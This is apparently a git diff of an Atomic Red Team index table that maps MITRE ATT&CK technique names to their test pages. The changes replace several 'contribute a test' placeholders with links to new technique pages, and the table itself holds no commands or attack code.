 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
-| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Administration Command](../../T1609/T1609.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Build Image on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Container API](../../T1552.007/T1552.007.md) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deploy Container](../../T1610/T1610.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Configuration Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
@@ -18,9 +18,9 @@
 | Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DCSync](../../T1003.006/T1003.006.md) | Internet Connection Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Inhibit System Recovery](../../T1490/T1490.md) |
 | Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Traffic Duplication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Internal Defacement](../../T1491.001/T1491.001.md) |
 | Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | [Browser Extensions](../../T1176/T1176.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Malicious File](../../T1204.002/T1204.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Compile After Delivery](../../T1027.004/T1027.004.md) | Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Service Scanning](../../T1046/T1046.md) | [Software Deployment Tools](../../T1072/T1072.md) | Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Change Default File Association](../../T1546.001/T1546.001.md) | [Container Orchestration Job](../../T1053.007/T1053.007.md) | [Compiled HTML File](../../T1218.001/T1218.001.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Email Forwarding Rule [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-|  | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
+|  | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cloud Account](../../T1136.003/T1136.003.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Sniffing](../../T1040/T1040.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) |  | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) |
 |  | [Native API](../../T1106/T1106.md) | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Control Panel](../../T1218.002/T1218.002.md) | [Golden Ticket](../../T1558.001/T1558.001.md) | [Password Policy Discovery](../../T1201/T1201.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | Network Device CLI [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Create Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Group Policy Preferences](../../T1552.006/T1552.006.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keylogging](../../T1056.001/T1056.001.md) |  | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 |  | [PowerShell](../../T1059.001/T1059.001.md) | Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Create Process with Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Remote Management](../../T1021.006/T1021.006.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) |
@@ -30,7 +30,7 @@
 |  | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) |  | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Service Execution](../../T1569.002/T1569.002.md) | [Cron](../../T1053.003/T1053.003.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [LSA Secrets](../../T1003.004/T1003.004.md) | [Software Discovery](../../T1518/T1518.md) |  | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | [Non-Standard Port](../../T1571/T1571.md) |  |
 |  | Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Checks](../../T1497.001/T1497.001.md) |  | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
-|  | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
+|  | [Software Deployment Tools](../../T1072/T1072.md) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Deploy Container](../../T1610/T1610.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) |  | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Direct Volume Access](../../T1006/T1006.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | System Location Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1136.002/T1136.002.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable Cloud Logs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Network Configuration Discovery](../../T1016/T1016.md) |  | [Screen Capture](../../T1113/T1113.md) |  | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  | [Systemd Timers](../../T1053.006/T1053.006.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Device Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) |  | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
@@ -43,7 +43,7 @@
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) |  |  |  |  | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |
 |  |  | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) |  |  |  |  |  |  |
-|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
+|  |  | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Proc Filesystem](../../T1003.007/T1003.007.md) |  |  |  |  |  |  |
 |  |  | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
 |  |  | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Security Account Manager](../../T1003.002/T1003.002.md) |  |  |  |  |  |  |
 |  |  | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Launch Daemon](../../T1543.004/T1543.004.md) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |
@@ -76,10 +76,10 @@
 |  |  | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | [Local Accounts](../../T1078.003/T1078.003.md) |  |  |  |  |  |  |  |
 |  |  | [Port Monitors](../../T1547.010/T1547.010.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [MSBuild](../../T1127.001/T1127.001.md) |  |  |  |  |  |  |  |
 |  |  | [PowerShell Profile](../../T1546.013/T1546.013.md) | [Screensaver](../../T1546.002/T1546.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
-|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
 |  |  | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
 |  |  | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) |  |  |  |  |  |  |  |
-|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
+|  |  | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) |  |  |  |  |  |  |  |
 |  |  | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |  |  |  |  |  |  |  |
 |  |  | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
@@ -5,7 +5,7 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Alternative Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Account](../../T1087.002/T1087.002.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
